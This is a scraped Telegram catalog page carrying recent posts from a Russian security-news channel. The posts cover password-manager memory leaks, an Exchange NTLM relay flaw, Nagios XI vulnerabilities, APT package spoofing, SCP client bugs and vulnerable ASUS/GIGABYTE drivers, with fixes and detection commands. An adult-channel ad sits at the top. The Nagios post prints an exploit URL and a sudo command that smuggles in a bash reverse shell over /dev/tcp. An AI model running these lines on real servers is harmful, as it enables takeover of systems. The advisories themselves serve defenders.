🔥ЛУЧШИЙ ТГ КАНАЛ 18+ У НАС🔥


@erostiktokos

🔞Разнообразный контент
❤️ Лучшие девушки
✅ Переходи и убедись сам

/ категории / Технологии /

Information Hardening



@informhardening
1478 +1

Практическое применение безопасности @Li11ian


PPD: 0.08, PV: 2043, DV: 156, ERR: 138%

ТОП каналов

آکادمی ترانه


@tgacademy
554.43K -2.82K

معرفی کانال ها، بات ها و مقالات جالب و کاربردی در مورد تلگرام و سرویس های دنیای ترانه. 📨 ارتباط با ادمین، تبلیغات و پخش موسیقی: @academy_contact 📷اینستا: https://goo.gl/MFTk9B

PINK PROXY


@PinkProxy
405.62K +520

☑️ Collection of MTProto Proxies 🔘 تبليغات بنرى: 📈 @PinkProxy_Ads 🔘 پشتيبانى و ارسال پراكسى: 👨‍💻 @Pink1Support_Bot 👨‍💻 @Pink2Support_Bot 🌸 پينك پراكسى، قديمى ترين تيم پراكسى ايران 🌸

Код Дурова


@d_code
138.87K +15

Самые интересные новости из мира IT и науки. Ещё больше тут — kod.ru ВК — vk.com/kod Instagram — goo.gl/VTbHqM Команда: @gaik1 / ad@kod.ru - Реклама @dolbolob - Главный редактор @vojtenko14 - Глава отдела лонгридов Канал не ведется Павлом Дуровым

Telegram Baza


@tbaza
112.30K -380

Телеграм каталог Размещение - [450 руб] Повторное - [350 руб] ⤴️ @AddTbazaBot ⤵️ Внимание! Перед добавлением ознакомьтесь с правилами размещения - https://telegra.ph/Pravila-06-12 - По всем вопросам - @TbazaBot

Телеблог


@teleblog
102.00K -186

Главный блог о Telegram. Новости, инсайды, лайфхаки. Всё, чем живет Telegram-сообщество, и даже больше. Реклама: @AdsTeleblogBot Помогает обойти блокировку: @TeleBlogbigbot admin: @admteleblog

WylsacomRed


@Wylsared
93.19K -147

Единственный легальный канал Wylsacom Media. По всем вопросам пишите сюда: alexanpob@wylsacom.media Видео: https://www.youtube.com/user/Wylsacom Сайт: https://wylsa.com ВК: https://vk.com/wylsacom Instagram: https://www.instagram.com/wylsacom_red/

Каталог Telegram каналов, ботов


@openbusines
92.02K -263

Каталог каналов и ботов в Telegram. По всем вопросам пишите в бот @AddkatalogBot

Недавние публикации

3254

если коротко и наглядно


08:08 07.03.19
3535

пароли

Как выбрать и правильно использовать менеджер паролей

...и перестать уже хранить пароли в txt и doc взломщикам на радость.

Ребятки из Independent Security Evaluators запилили опупенно интересную статью о безопасности различных менеджерей паролей. Исследование включало 1Password7, 1Password4, Dashlane, KeePass и LastPass. В результате оказалось, что с защитой данных, когда приложение не запущено, все менеджеры справляются хорошо. А вот когда приложение запущено, в том числе когда база паролей была уже заблокирована после использования (состояние locked), степень реализуемой защиты колеблется от не очень хорошей до очень плохой.

1Password7 (7.2.576)
При введении мастер-пароля расшифровывает сразу все пароли из базы и сохраняет их в оперативной памяти. Также хранит в оперативной памяти в открытом виде мастер-пароль и дополнительный секретный ключ. Все это не удаляется и остается в памяти при переводе в заблокированное состояние.

1Password4 (4.6.2.626)
Хотя это устаревшая версия, ее защита лучше. Она расшифровывает пароли по одному и сохраняет в памяти в открытом виде только те, к которым было обращение. При блокировке эта память освобождается, но не затирается сразу. А вот мастер-пароль хранится в памяти как в разблокированном, так и в заблокированном состоянии, почти в открытом виде - для декодирования необходимо запутстить две функции RtlRunEncodeUnicodeString и RtlRunDecodeUnicodeString.

Dashlane (6.1843.0)
Этот менеджер имеет важную отличительную особенность - при закрытии приложения стандартными методами (нажатие на [x], Alt+F4) он не закрывается (как это делают остальные), а сворачивается в трей.
Dashlane хранит в памяти расшифрованной только последнюю запись, к которой обращался пользователь. Но если пользователь что-то редактировал, то расшифровывается и помещается в память вся база. В обоих случаях расшифрованные данные остаются в памяти и после блокировки - на некоторое время - память освобождается, но не затирается.

KeePass (2.40)
Расшифровывает и сохраняет в памяти записи по мере обращения к ним. После блокировки эти записи остаются в памяти в открытом виде.

LastPass (4.1.59)
Расшифровывает пароли по одному при обращении к ним, но не удаляет эти пароли из памяти при переходе в заблокированное состояние. Мастер-пароль затирает сразу после выработки ключей фразой 'lastpass rocks', но во время выработки ключей мастер-пароль сохраняется в другом буфере в оперативной памяти в открытом виде и так и остается там. Фразу 'lastpass rocks' можно использовать для его легкого поиска после применения strings к дампу памяти - он будет рядом в пределах нескольких строк =)

Так что любой менеджер лучше выключать, а не блокировать. А некоторые еще и мастер-пароль могут спалить.

Источник (с красивыми картинками, примерами, ссылками на материалы, да и вообще читается приятно): https://www.securityevaluators.com/casestudies/password-manager-hacking/


08:08 07.03.19
2835

exchange #exploit

Подстава от Exchange

В последнее время обсуждается непотребное поведение Exchange: при отправке push-уведомлений (функция PushSubscription) он использует свою привилегированную учетку, потому что в функции BeginSendNotification:

notificationServiceClient.Credentials = CredentialCache.DefaultCredentials;

где CredentialCache.DefaultCredentials выполняется от имени NT AUTHORITY\SYSTEM.

Отправлять push-уведомления можно на любой HTTP-сервер, какой пожелает настроить авторизованный пользователь Exchange. Ну и дальше NTLM-relay с правами сервера Exchange.

Один из вариантов реализации атаки предполагает получение прав любого пользователя Exchange на самом сервере, подробно описан тут: https://www.thezdi.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange, и прилагаются эксплойты, по умолчанию создающие правило перенаправления входящих жертвы на ящик атакующего. От этой атаки (CVE-2018-8581) Microsoft выпустила очумительную рекомендацию по защите:

reg delete HKEYLOCALMACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableLoopbackCheck /f

Это спасает только от релея на исходный сервер.

Другой вариант атаки использует релей на другие хосты (DC в частности) и основан на обычно высоких привилегиях Exchange в домене, в том числе наличии прав на операции DCSync. Описание атаки с нюансами: https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/. Прилагается скрипт для провокации Exchange на аутентификацию, а также скрипт для двойного релея, чтобы еще и креды для ящика не нужны были.


07:07 20.02.19
2333

nagios #exploit #обновления

Целая лаба для школьников

В Nagios XI 5.5.6 выявлена сразу пачка простых и эффективных уязвимостей, среди которых удаленное выполнение произвольного кода с правами юзера apache и повышение привилегий, что в комбинации позволяет получить полный доступ к серверу. Доступна версия Nagios XI 5.5.7, в которой данные дыры устранены.

CVE-2018-15708 - RCE с правами apache. Проблема в Snoopy.class.inc, содержащем такой код:

exec($this->curlpath." -D \"/tmp/$headerfile\"".escapeshellcmd($cmdlineparams)." ".escapeshellcmd($URI),$results,$return);

где $URI может быть передан через URI запроса к magpiedebug.php, что позволяет модифицировать команду. Например, следующий запрос приведет к сохранению произвольного файла в /usr/local/nagvis/share, откуда он может быть запущен через веб-интерфейс:

https://x.x.x.x/nagiosxi/includes/dashlets/rss
dashlet/magpierss/scripts/magpiedebug.php?url=https:///%20-o%20/usr/local/nagvis/share/exec.php

CVE-2018-15710 - повышение привилегий через параметр addresses в функции autodiscover
new.php. По умолчанию в /etc/sudoers прописываются разрешения запуска данного скрипта с правами рута и без пароля для юзеров apache и nagios. Пример запуска обратного шелла с повышением:

sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/0;/bin/bash -i >& /dev/tcp//4444 0>&1;'

И еще:

CVE-2018-15709 - внедрение команд ОС через веб-интерфейс авторизованным пользователем.

CVE-2018-15711 - повышение привилегий авторизованным пользователем Nagios через переустановку ключей администраторов.

CVE-2018-15712 - хранимая XSS от лица неавторизованного пользователя.

CVE-2018-15713 - хранимая XSS от авторизованного пользователя.

CVE-2018-15714 - отраженная XSS

Описание уязвимостей, пути, параметры, форматы можно посмотреть тут: https://www.tenable.com/security/research/tra-2018-37
Вариант совмещения и автоматизации для первых двух дыр: https://www.exploit-db.com/exploits/46221


08:08 05.02.19
2086

linux #обновления #exploit

Подделка пакетов в APT

В APT найдена уязвимость, позволяющая подменить пакеты при загрузке по HTTP. Обычно APT проверяет хеши пакетов и их размер по базе метаданных доверенных пакетов, заверенных цифровой подписью. Однако, как оказалось, данную проверку можно обойти. Конечно, у взломщика должен быть доступ к потоку HTTP-трафика.

Для загрузки данных из репозитория APT запускает дочерний процесс. Взаимодействие между родительским и дочерним процессом происходит с помощью обмена текстовыми командами и данными. Когда загрузка завершена, дочерний процесс отправляет сообщение с уже посчитанными хешами и размером пакета подобное такому:
201 URI Done
URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay3.03+dfsg2-3all.deb
Filename: /var/cache/apt/archives/partial/cowsay3.03+dfsg2-3all.deb
Size: 20070
Last-Modified: Tue, 17 Jan 2017 18:05:21 +0000
MD5-Hash: 27967ddb76b2c394a0714480b7072ab3
MD5Sum-Hash: 27967ddb76b2c394a0714480b7072ab3
SHA256-Hash: 858d5116a60ba2acef9f30e08c057ab18b1bd6df5ca61c233b6b7492fbf6b831
Checksum-FileSize-Hash: 20070

В тех случаях, когда дочерний процесс получает от репозитория редирект HTTP, он передает родительскому сообщение следующего вида:
103 Redirect
URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay3.03+dfsg2-3all.deb
New-URI: http://example.com/new-uri

И значение New-URI тут берется из заголовка Location редиректа HTTP. В нем то и присутствует уязвимость - в него можно включать переносы строк, что позволяет полностью подделать сообщение об успешной загрузке и все хеши в нем. Родительский процесс будет полагаться на эти значения хешей и размера пакета при проверке, хотя по факту был загружен совсем другой пакет.

Проблема получила идентификатор CVE-2019-3462 и исправлена в версии 1.4.9 APT. Обновленная версия уже доступна в репозиториях Ubuntu и Debian.

Статья исследователя, включающая еще размышления на тему отключения редиректов и предпочтения HTTPS: https://justi.cz/security/2019/01/22/apt-rce.html


07:07 31.01.19
2313

soft #обновления #конфигурация

Неприятности с различными клиентами SCP

Несколько новых уязвимостей в самых распространенных реализациях клиента SCP (особо важно для тех, кто часто подключается к чужим серверам):
CVE-2019-6111 - присутствует в OpenSSH scp <=7.9 - недобросовестный сервер может перезаписать произвольные файлы в целевом каталоге на стороне клиента, а также подкатологи, если выполняется рекурсивное копирование.
CVE-2018-20685 - OpenSSH scp <=7.9 и WinSCP <=5.13 - недобросовестный сервер может изменить права доступа к целевому каталогу на стороне клиента.
CVE-2019-6109 и CVE-2019-6110 - OpenSSH scp <=7.9 и PuTTY PSCP - дают серверу возможность манипулировать выводом на стороне клиента через имена объектов и стандартный поток ошибок с помощью управляющих символов ASCII и скрыть действия, произведенные через предыдущие уязвимости.

Для WinSCP доступна версия с исправлением - 5.14.

Для OpenSSH исправленной версии пока нет, но есть патч https://sintonen.fi/advisories/scp-name-validator.patch
Либо можно включить и использовать SFTP, входящий в состав OpenSSH:
Subsystem sftp /usr/lib/openssh/sftp-server (в отдельном процессе)
или
Subsystem sftp internal-sftp (встроенный, в процессе sshd)

Для PuTTY нет обновлений, но и уязвимости в нем не устрашающие.


07:07 23.01.19
1960

windows #soft #exploit

В то время, как критичный софт обновляется сам

Еще в конце прошлого года была опубликована информация об уязвимостях в некоторых драйверах ASUS и GIGABYTE. Уязвимости позволяют локально повысить привилегии до полного доступа к системе.

Перечень известных приложений, включающих уязвимые драйвера:
- ASUS Aura Sync v1.07.22 и раньше, а также более поздние версии, в которых исправлена только часть уязвимостей
- GIGABYTE APP Center v1.05.21 и раньше
- AORUS GRAPHICS ENGINE v1.33 и раньше
- XTREME GAMING ENGINE v1.25 и раньше
- OC GURU II v2.08

Проверить наличие уязвимых драйверов:

driverquery /V | findstr /I /C:GPCIDrv /C:GDrv /C:GLCKIo /C:Asusgio

Проверить наличие проблемных приложений:

wmic product get name | findstr /I /C:"ASUS Aura Sync" /C:"GIGABYTE APP Center" /C:"AORUS GRAPHICS ENGINE" /C:"XTREME GAMING ENGINE" /C:"OC GURU"

Выпуск исправлений дается тяжело: ASUS продвигается в устранении дыр, но постепенно, а GIGABYTE утверждает, что он хардварная компания, не особо то занимается софтом, а заявленных уязвимостей в их продуктах нет.

Описание уязвимостей и коды PoC от ресечеров: https://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities, https://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-privilege-vulnerabilities


08:08 15.01.19